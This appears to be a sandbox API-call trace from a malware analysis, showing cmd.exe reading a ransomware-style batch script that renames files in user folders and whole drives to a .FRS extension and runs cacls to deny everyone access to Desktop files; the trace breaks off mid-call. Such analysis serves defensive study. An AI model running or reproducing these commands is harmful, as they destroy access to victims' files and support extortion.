(in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.343] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.343] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.343] GetFileType (hFile=0x254) returned 0x1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.343] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0086.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0086.343] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.343] GetFileType (hFile=0x254) returned 0x1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0086.343] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0086.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0086.343] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.343] GetFileType (hFile=0x254) returned 0x1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0086.343] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0086.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0086.343] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.343] GetFileType (hFile=0x254) returned 0x1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0086.343] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0086.343] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0086.343] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0086.343] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.344] GetFileType (hFile=0x254) returned 0x1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0086.344] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0086.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0086.344] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.344] GetFileType (hFile=0x254) returned 0x1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0086.344] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0086.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0086.344] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.344] GetFileType (hFile=0x254) returned 0x1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0086.344] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0086.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0086.344] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.344] GetFileType (hFile=0x254) returned 0x1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0086.344] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0086.344] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0086.344] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.344] GetFileType (hFile=0x254) returned 0x1 [0086.344] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0086.345] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0086.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0086.345] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.345] GetFileType (hFile=0x254) returned 0x1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0086.345] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0086.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0086.345] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.345] GetFileType (hFile=0x254) returned 0x1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0086.345] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0086.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0086.345] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.345] GetFileType (hFile=0x254) returned 0x1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0086.345] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0086.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0086.345] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.345] GetFileType (hFile=0x254) returned 0x1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0086.345] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.345] SetFilePointer (in: hFile=0x254, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0086.345] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0086.346] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.346] GetFileType (hFile=0x254) returned 0x1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0086.346] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0086.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0086.346] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.346] GetFileType (hFile=0x254) returned 0x1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0086.346] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0086.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0086.346] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.346] GetFileType (hFile=0x254) returned 0x1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0086.346] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0086.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0086.346] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.346] GetFileType (hFile=0x254) returned 0x1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0086.346] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.346] SetFilePointer (in: hFile=0x254, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0086.346] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0086.347] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.347] GetFileType (hFile=0x254) returned 0x1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0086.347] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0086.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0086.347] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.347] GetFileType (hFile=0x254) returned 0x1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0086.347] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0086.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0086.347] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.347] GetFileType (hFile=0x254) returned 0x1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0086.347] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0086.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0086.347] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.347] GetFileType (hFile=0x254) returned 0x1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0086.347] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0086.347] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0086.347] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0086.347] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.347] GetFileType (hFile=0x254) returned 0x1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0086.348] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0086.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0086.348] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.348] GetFileType (hFile=0x254) returned 0x1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0086.348] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0086.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0086.348] _get_osfhandle (_FileHandle=3) returned 0x254 [0086.348] GetFileType (hFile=0x254) returned 0x1 [0086.348] SetFilePointer (in: hFile=0x254, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0086.348] ReadFile (in: hFile=0x254, lpBuffer=0x12b6840, 